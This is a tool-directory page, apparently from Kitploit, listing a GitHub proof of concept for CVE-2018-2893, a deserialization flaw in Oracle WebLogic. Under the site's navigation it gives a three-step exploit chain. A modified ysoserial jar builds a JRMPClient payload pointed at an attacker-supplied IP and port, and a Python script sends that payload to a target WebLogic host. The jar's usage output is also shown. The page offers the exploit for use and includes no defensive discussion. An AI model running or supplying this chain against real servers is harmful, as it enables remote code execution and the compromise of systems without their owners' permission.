Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-2893 — CVE-2018-2893 PoC | Kitploit
Tools/GitHubGitHub/artofwar344/cve-2018-2893
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubartofwar344/cve-2018-2893

CVE-2018-2893

CVE-2018-2893 PoC

View Repository
338 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2018-2893

Step 1

java -jar ysoserial-cve-2018-2893.jar

root@kitploit:~
WHY SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
     Payload     Authors   Dependencies
     -------     -------   ------------
     JRMPClient  @mbechler
     JRMPClient2 @pynerd
     JRMPClient3 @pynerd
     JRMPClient4 @pynerd
     Jdk7u21     @frohoff

Step 2

java -jar ysoserial-cve-2018-2893.jar JRMPClient4 "<ip>:<port>" > poc4.ser

Step 3

python weblogic.py <host> <port> poc4.ser

Download Tool